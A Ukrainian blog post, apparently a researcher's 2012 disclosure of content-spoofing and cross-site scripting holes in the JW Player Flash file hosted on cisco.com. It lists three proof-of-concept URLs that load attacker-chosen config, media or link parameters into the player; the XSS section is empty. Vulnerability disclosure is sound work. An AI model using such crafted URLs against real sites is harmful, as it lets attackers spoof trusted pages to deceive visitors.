Нові уразливості на www.cisco.com

23:54 26.09.2012

У січні, 07.01.2012, я знайшов нові уразливості на сайті http://www.cisco.com. Це Content Spoofing та Cross-Site Scripting уразливості і вони мають місце в JW Player та в JW Player Pro, про які я писав раніше. Мало того, що Cisco роками тримає ці дірки в себе на сайті та ще й пройшло чимало часу після того, як я оприлюднив дірки в JW Player (а пізніше й в JW Player Pro), але вони до сих пір не виправили їх в себе на сайті.

Раніше я вже писав про уразливості на www.cisco.com.

Content Spoofing:

http://www.cisco.com/assets/swa/flash/mediaplayer/jw4.swf?config=http://site/1.xml
http://www.cisco.com/assets/swa/flash/mediaplayer/jw4.swf?file=http://site/1.flv&image=http://site/1.jpg
http://www.cisco.com/assets/swa/flash/mediaplayer/jw4.swf?abouttext=Player&aboutlink=http://site

При підключенні плагіна captions також можна проводити CS атаку через параметр captions.file.

XSS:


Leave a Reply

You must be logged in to post a comment.